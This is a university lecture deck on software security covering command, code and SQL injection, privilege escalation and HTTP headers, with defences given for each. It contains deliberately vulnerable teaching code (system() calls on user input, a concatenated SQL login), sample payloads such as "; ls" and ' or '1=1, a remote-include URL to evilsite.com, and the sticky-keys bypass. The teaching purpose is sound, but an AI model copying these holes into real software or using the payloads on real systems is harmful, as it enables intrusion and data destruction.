Chapter 2:

Software Security Issues

Presented by: Biniyam A.

 Cont…
Application Software: Definition
Software is typically stored on an external long-term memory device, such as a hard
drive or magnetic diskette. When the program is in use, the computer reads it from the
storage device and temporarily places the instructions in random access memory
(RAM). The process of storing and then performing the instructions is called “running,”
or “executing,” a program.
Examples, word processor, media player and Internet browser

2
 Cont…
Application Software: Processes
So this is whate every software application actually do.
1. Accept the input from user. For example entering username and password on login
screen.
2. Process the user input. For example check if username and password are valid or not
blank.
3. Store the data. For example storing user preference or any kind of application data.
4. Return the output to user on same or another screen. For example showing error if
password is not much strong.

3
 Cont…
Application Software: Parts
Based on above understanding we can say that any software application has mainly 3
parts
1. Frontend or user interface. This part is whatever that is visible to user. For example a
login screen, list of products on shopping website, an error message etc.
2. Middle ware or processing logic. This part is responsible for processing user input,
validations, storing the data and presenting output back to user. Middleware is a logic
part which is never visible to user.
3. Data storage. This part is responsible for storing the application data. For example
user preference and application settings.

4
 Cont…
Application Software Security: Command Injection
 Command injection: is an attack in which the goal is execution of arbitrary commands
on the host operating system through a vulnerable application.
 Command injection attacks are possible when an application passes unsafe user supplied
or input data (such as forms, cookies, HTTP headers … etc.) to a system shell.
 In this attack, the attacker-supplied operating system commands are usually executed
with the privileges of the vulnerable application.
 Command injection attacks are possible largely due to insufficient input validation.
 Command injection take place in the following form:
1. Direct execution of shell commands
2. Injecting malicious files into a servers run-time environment
5
3. Exploiting vulnerabilities in configuration files such as .xml, .json and others
 Cont…
Application Software Security: Command Injection
 The attacker executes commands without using any malicious code, but it uses the
vulnerability exploits of an application program to execute the command on OS system
shell
 Command injection could be performed:
 Arbitrary command injection
 Arbitrary file uploads
 Insecure serialization: through an insecure communication channel data submission
either a cookie or form-data input

6
 Cont…
Application Software Security: Command Injection
Example 1:
normal execution
#include <stdio.h> $ ./catWrapper Story.txt
#include <unistd.h> When last we left our
int main(int argc, char **argv) heroes...
Command inject execution
{
$ ./catWrapper "Story.txt; ls"
char cat[] = "cat ";
When last we left our
char *command;
heroes...
size_t commandLength;
Story.txt
nullpointer.c
commandLength = strlen(cat) + strlen(argv[1]) + 1;
command = (char *) malloc(commandLength);
strncpy(command, cat, commandLength);
strncat(command, argv[1], (commandLength - strlen(cat)) );

system(command);
return (0); 7
 Cont…
Application Software Security: Command Injection
Example 2:
<?php
print("Please specify the name of the file to delete");
print("<p>");
$file=$_GET['filename'];
system("rm $file");
?>

8
 Cont…
Application Software Security: Code Injection

 Code Injection: is the general term for attack types which consist of injecting code that
is either interpreted or executed by the application.
 This type of attack exploits poor handling of untrusted data.
 These types of attacks are usually made possible due to a lack of proper input/output
data validation, for example:
 allowed characters (standard regular expressions classes or custom)
 data format and the size (amount) of expected data
 Code Injection differs from Command Injection in that an attacker is only limited by
the functionality of the injected language itself. If an attacker is able to inject PHP
code into an application and have it executed, they are only limited by what PHP is
9
 Cont…
Application Software Security: Command Injection
Example
 If an application passes a parameter sent using HTTP GET request to the PHP include()
function with no input validation, the attacker may try to execute code other than what
the developer had in mind (expected)
 The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
 The file “evilcode.php” may contain, for example, the phpinfo(); function which is
useful for gaining information about the configuration of the environment in which the
web service runs. An attacker can ask the application to execute their PHP code using
the following request: http://testsite.com/?page=http://evilsite.com/evilcode.php
10
 Cont…
Application Software Security: Command Injection
Risk Factors
 These types of vulnerabilities can range from very hard to find, to easy to find
 If found, are usually moderately hard to exploit, depending of scenario
 If successfully exploited, its impact could cover loss of confidentiality, loss of
integrity, loss of availability, and/or loss of accountability

11
 Cont…
Application Software Security:
How do we prevent command (code) injection?
 Avoid system calls from our application software and/or remove illegal characters

(symbols) from users input [especially illegal characters such as: ; && | …]
 Setup or implement an input validation mechanisms
 Create a white-listing: enforce the system to accept only a pre-configured and tested
inputs
 Use only a secure API for example, in java Runtime.exec() to execute system
command
 Setup or configure Opearating Systems users settings to have or set a least privilege
(limit users privilege and permission on the system)
12
 Cont…
Application Software Security: SQL Injection
 A SQL injection: attack consists of insertion or “injection” of a SQL query through the
input data received from the client to the application software.
 A successful SQL injection exploit can:
 Read sensitive data from the database,
 modify database data (Insert/Update/Delete),
 execute administration operations on the database (such as shutdown the DBMS),
 recover the content of a given file present on the DBMS file system and
 in some cases issue commands to the operating system.
 SQL injection attacks are a type of injection attack, in which SQL commands are
injected into our applications persistence data management in order to affect the
13
execution of predefined SQL commands.
 Cont…
Application Software Security: SQL Injection
Categories of SQL Injection
SQL injection attack can be categorized into three (3):
A. in-bound SQL injection: the attacker uses the same communication channel to
perform their attack, and waits for the responses of the DBMS then use the system
responses.
 There are two (2) types of In-Bound SQL injections
1. Error based: the attacker performs/conduct an attack on the database that
cause/produce an error message
2. Union based: the attacker uses the advantages of union SQL operator, which
performs multiple select statements to be generated by the database to get a single
result. 14
 Cont…
Application Software Security: SQL Injection
Categories of SQL Injection
B. Internal (Blind) SQL injection: the attacker sends a data payload to the database
server, and observes the responses and behavior of the server to learn (gain
information) about the database server structure and DBMS servers configuration
C. Out-of-band SQL injection: the attacker only performs an attack when
certain/specific features are enabled on the database server which is used by the
application.
 It is an alternative way of attack for both in-bound and internal SQL injection
techniques.

15
Application Software Security: SQL Injection Cont…

Example: simple users login

Public Class account{ Input:
 Username: ‘abebe’
public bool login(string user_name, string user_password){
 Password: ‘ or ‘1=‘1
Statement stmt = connection.createStatement();
String SQL = "SELECT * FROM users WHERE users_name='" + user_name + "' &&
users_password='" + user_password + "'";
ResultSet rs = stmt.executeQuery(SQL);
/* Check Username and Password /* Check Username and Password
Option 1: if statement*/ Option 2: while loop*/
If(rs.next()) while (rs.next())
{ return true; } { return true; }
return false;
} /* end of login method */
16
} /* end of account class */
 Cont…
Application Software Security: SQL Injection
Threats
 SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the
complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
 SQL Injection is very common with PHP and ASP applications due to the prevalence of
older functional interfaces. Due to the nature of programmatic interfaces available,
J2EE and ASP.NET applications are less likely to have easily exploited SQL injections.
 The severity of SQL Injection attacks is limited by the attacker’s skill and imagination,
and to a lesser extent, defense in depth countermeasures, such as least privilege
connections to the database server and so on. 17
 Cont…
Application Software Security: SQL Injection
How do we prevent SQL injection?

 Primary defense mechanism

 Option 1: Use of Prepared Statements (with Parameterized Queries)
 Option 2: Use of Properly Constructed Stored Procedures
 Option 3: Allow-list Input Validation [especially inside the business logic processor]
 Option 4: apply white-listing of users inputs i.e. remove special characters which is
used by the DBMS or SQL for example, `, &&, || -- symbols from the users input
before executing the query in a given DBMSs database

18
 Cont…
Application Software Security: SQL Injection
How do we prevent SQL injection?
 Example: Use of Prepared Statements (with Parameterized Queries)

/* perform an input validation on the custname string */

String custname = request.getParameter("customerName");
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";

/* when the program is executed the query and the parameters bind at run-time without the
need for additional query manipulation methods */
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( ); 19
 Cont…
Application Software Security: SQL Injection
How do we prevent SQL injection?

 Additional Tips: in order to build an application software with a security consideration,

we should have to implement
 An input validation mechanism [especially, on the front-end part of the
application]
 Apply (implement) a proper Error and Exception handling mechanism
 Design (implement) a proper Access Control and Authentication mechanism
 Properly identify and determine a configuration file storage location and
protection mechanisms

20
 Cont…
Application Software Security: Privilege Escalation (Elevation)
 Privilege escalation: is when a threat actor (attacker) gains elevated access and
administrative rights to a system by exploiting security vulnerabilities.
 The attacker might gain access by modifying identity permissions to grant themselves
elevated rights and admin capabilities, attackers can conduct malicious activities,
potentially resulting in significant damages.
 Systems have different levels of privileges, which range from basic users with limited
permissions to administrators with complete control. A successful privilege escalation
incident means that an attacker has managed to escalate their own privilege level
 Cyber attackers use privilege escalation to open-up new attack vectors on a target
system. This enables them to evolve attacks from simple malware infections to
21
catastrophic data breaches and network intrusions.
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Types of Privilege Escalation: Vertical Privilege Escalation
 There are two (2) types of privilege escalation attacks that threat actors use either:
vertical and/or horizontal. While both types involve attackers attempting to gain
unauthorized access to resources or perform malicious actions

1. An attacker can use vertical privilege escalation to gain access from a standard user
account to higher-level privileges, such as superuser or administrator
 Thereby granting them unrestricted control over the entire system.
 Oftentimes, this gives them full control over the system, allowing them to modify
configurations, install software, create new user accounts with escalated
privileges or even delete essential data from the system
22
Application Software Security: Privilege Escalation (Elevation) Cont…

Types of Privilege Escalation: Horizontal Privilege Escalation

2. Horizontal privilege escalation occurs when an attacker gains access at the same
permission level but under different user identities.
 For example, when an attacker uses an employee's stolen credentials, this is horizontal
privilege escalation.
 The goal here isn't necessarily to gain root privileges. Instead, the goal is to access
sensitive information that belongs to other users within the same privilege level.
 The key difference between these two types of attack lies in the kind of access the
attacker seeks. With vertical escalation, an attacker takes advantage of vulnerabilities for
elevated permissions.
 In contrast, with horizontal escalation the attacker exploits weak security practices
23
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Types of Privilege Escalation: Horizontal Privilege Escalation

 Detecting both types of privilege escalation requires vigilance and robust cybersecurity
measures.
 These measures include using security monitoring systems that detect unusual activity
and implementing robust authentication methods.
 Organizations must be aware of the mechanisms behind these assaults and how they’re
carried out to ensure they are adequately shielded from potential threats.

24
 Cont…
Application Software Security: Privilege Escalation (Elevation)
How to Detect Privilege Escalation Attacks
Preventing unauthorized access and maintaining system security requires an effective
detection capabilities. There are several ways organizations can detect privilege escalation
attacks, including:
 Audit system logs: Review system logs regularly to view (review) unusual patterns or
suspicious activity, such as repeatedly failed login attempts or abnormal command
usage.
 Anomaly detection tools: Identify deviations from normal behavior within your
network using anomaly detection tools.
 For instance, sudden changes in user roles could indicate an ongoing privilege
escalation incident. 25
 Cont…
Application Software Security: Privilege Escalation (Elevation)
How to Detect Privilege Escalation Attacks
 User and entity behavior analytics (UEBA): UEBA can identify potential privilege
escalation attempts using machine learning algorithms to understand typical user
behavior patterns. It can then send an alert when there's a deviation from the norm.
 Password monitoring: Implement password monitoring to alert you when passwords
are changed without authorization, which can indicate an attacker is trying to maintain
their escalated privileges over time.
 Intrusion detection systems (IDS): IDC can scan for known signatures of common
privilege escalation techniques like buffer overflow exploits or SQL injection attacks. As
a result, they can detect incidents early before significant damage occurs.
26
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Preventing Privilege Escalation Attacks
In cybersecurity, effective cyber attack prevention is always better than having a sound
disaster recovery plan. Here are some of the most fundamental measures used to prevent
privilege escalation attacks:
A. Regular system patching: It’s important to have a patch management strategy.
 Maintaining systems with the most current patches can reduce the chance of threat
actors using known security flaws in software programs or operating systems for
their attacks.
B. Strong authentication methods: Implement two-factor authentication (2FA) or
multifactor authentication (MFA) to deter credential theft and make it harder for
malicious actors to gain unauthorized access. 27
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Preventing Privilege Escalation Attacks
C. User activity monitoring: Monitor user activity for suspicious behavior that could
indicate a privileged account has been compromised.
 Detecting privilege escalation involves monitoring for sudden changes (anomalous
activities ) in user behavior patterns or unusual system administrator activities.
D. Strong password security policies: Make sure to have password policies that require
users to create secure, complex passwords that are updated regularly.
E. The least privilege principle: Apply the principle of least privilege by limiting users'
permissions to only what is necessary for their role.
 This reduces potential damage if an attacker compromises a user’s account.
28
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Preventing Privilege Escalation Attacks
F. Sudo (Administrator) access control: In Linux environments, controlling sudo access
can help prevent Linux privilege escalation incidents.
 Proper administration of sudo rights, including regularly reviewing who has them
and what commands they're allowed to execute with elevated permissions, helps
keep this threat at bay.

29
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Common Examples
Privilege escalation is a technique where an attacker compromises a system to gain
unauthorized access. This malicious activity can occur through various attack vectors, such
as stolen credentials, misconfigurations, malware or social engineering.
 Malware: Attackers often use malware payloads to attempt privilege elevation on
targeted systems. This type of attack typically starts with gaining basic level access
before deploying the malicious payload that escalates their authority within the system.
 Credential Exploitation: An attacker often attempts privilege escalation by taking
advantage of weak user accounts or stealing credentials. Once they have credentials in
hand, they can perform malicious actions under the guise of a privileged user.
30
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Common Examples
 Vulnerabilities and Exploits: A common method used in Linux and Windows privilege
escalation involves exploiting software vulnerabilities.
 For instance, if an application doesn't adhere to the principle of least privilege, it
may allow for vertical privilege escalation where an attacker gains root or
administrator privileges.
 Misconfigurations: Sometimes system administrators inadvertently create opportunities
for horizontal privilege escalation due to misconfiguration errors. These could include
granting sudo (administrator) access unnecessarily or not properly securing privileged
account information.
31
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Common Examples
 Social Engineering: This method relies heavily on human interaction rather than
technical flaws.
 A typical scenario might involve tricking employees into revealing their login
details, allowing attackers easy entry into secure networks.
 Detecting social engineering attacks requires human-centric vigilance. Luckily, tools
are also available that can specifically detect incidents which may involve escalated
privileges.

32
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Example, Operating Systems: Linux
The open-source nature of Linux makes it susceptible to certain types of privilege
escalation attacks, including:
 Kernel exploitation: A common method in which attackers take advantage of
vulnerabilities in the Linux kernel to gain root privileges. By exploiting these
weaknesses, they can execute malicious payloads that enable them to escalate privileges.
 Enumeration: Threat actors gather information about the system, such as user accounts
or network resources, that could be exploited for further attacks.
 SUDO right exploitation: Attackers often take advantage of poorly configured sudo
rights. If a privileged user has been careless with their sudo access permissions, an
attacker may be able to use this oversight for their own ends. 33
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Example, Operating Systems: Windows
Windows faces its share of privilege escalation incidents primarily because so many
enterprises rely on it for business operations. Here are some commonly used methods:
 Access token manipulation: This technique involves manipulating tokens associated
with privileged accounts to trick the system into granting higher-level access than
intended.
 Bypass user account control (UAC): An attacker might try bypassing UAC warnings
designed to prevent unauthorized changes by using stealthy processes that don't trigger
these alerts.

34
 Cont…
Application Software Security: Privilege Escalation (Elevation)
Example, Operating Systems: Windows
 Sticky keys: This attack replaces sethc(.exe) (the application responsible for sticky
keys) with cmd(.exe) (command prompt).
 This allows anyone pressing the “shift” key five times at the login screen to gain
administrator privileges without needing credentials.

35
 Cont…

Web Application Software

Security: issues

36
 Cont…
Web Application:
Relationship between client and server
 HTTP headers: let the client and the server pass additional information with an HTTP
request or response.
 An HTTP header consists of its case-insensitive name followed by a colon (:), then by its
value.

 Internet Browser  Apache

 Hardware module with a specialized Application  Negnix
Software [ Arduino, RosbeeryPi ]  IIS
 Handheld devices [PDA, Smartphones & Tab, TV]  Proxy server
37
 Cont…
Web Application: Hypertext Transfer Protocol (HTTP)
Request Header
 A request header: is an HTTP header that can be used in an HTTP request to provide
information about the request context, so that the server can tailor the response.
 For example, the Accept-* headers indicate the allowed and preferred formats of the
response.
 Other headers can be used to supply authentication credentials (e.g. Authorization), to
control caching, or to get information about the user agent or referrer, etc.

38
 Cont…
Web Application: Hypertext Transfer Protocol (HTTP)
Example: Request Header
GET /home.html HTTP/1.1
Host: developer.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://developer.mozilla.org/testpage.html
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 18 Jul 2016 02:36:04 GMT
If-None-Match: "c561c68d0ba92bbeb8b0fff2a9199f722e3a621a"
Cache-Control: max-age=0

39
 Cont…
Web Application: Hypertext Transfer Protocol (HTTP)
Response Header
 A response header: is an HTTP header that can be used in an HTTP response and that doesn't
relate to the content of the message.
 Response headers, like Age, Location or Server are used to give a more detailed context of the
response.
 Not all headers appearing in a response are categorized as response headers by the
specification.
 For example, the Content-Type header is a representation header indicating the original type of
data in the body of the response message (prior to the encoding in the Content-Encoding
representation header being applied).
 However, "conversationally" all headers are usually referred to as response headers in a
40
 Cont…
Web Application: Hypertext Transfer Protocol (HTTP)
Example: Response Header Content: Attribute
200 OK  Type: response and request
Access-Control-Allow-Origin: *  Length: size
Connection: Keep-Alive  Language: en-us
Content-Encoding: gzip  Encoding: gzip
Content-Type: text/html; charset=utf-8  Disposition: uploading/Download
Date: Mon, 18 Jul 2016 16:06:00 GMT
Etag: "c561c68d0ba92bbeb8b0f612a9199f722e3a621a"
Keep-Alive: timeout=5, max=997
Last-Modified: Mon, 18 Jul 2016 02:36:04 GMT
Server: Apache
Set-Cookie: my-key=my value; expires=Mon, 17-Jul-2017 16:06:00 GMT; Max-
Age=31449600; Path=/; secure
Transfer-Encoding: chunked
Vary: Cookie, Accept-Encoding
X-Backend-Server: developer2.webapp.scl3.mozilla.com
41
X-Cache-Info: not cacheable; meta data too large
 Cont…
Web Application: Hypertext Transfer Protocol (HTTP)
Header Methods
 GET - retrieve information
 POST - send information
 OPTIONS - available communication options
 HEAD - transfers the status line
 PUT - store an entity
 DELETE - deletes the specified source
 TRACE - diagnostic purposes
 CONNECT - establishes a tunnel

42
 Cont…

If you have any

questions you can Ask!!!
Thanks!

43
 Cont…
Assignment 1: in Group [1-to-5 Arrangement]
Define and Describe the following web-application security Attacks
Buffer overflow (Buffer overrun) and Cross Site Scripting Attack (XSS)
 Session/Cookie Hijacking
 Cross Site Request Forgery (CSRF)
 Directory (path) traversal
 Uniform Resource Locator (URL) manipulation
 When you discuss each attack types include the following:
1. How it works (how the attack is conducted/performed)
2. Illustrate your answer with an example (it might be a sample code or diagrams … etc)
 Submission Date: April 2, 2025 (on the exam date up to 12:00 PM [Mid Night 6:00 PM LT])
 Submission: {biniyam.abdi@ddu.edu.et} 44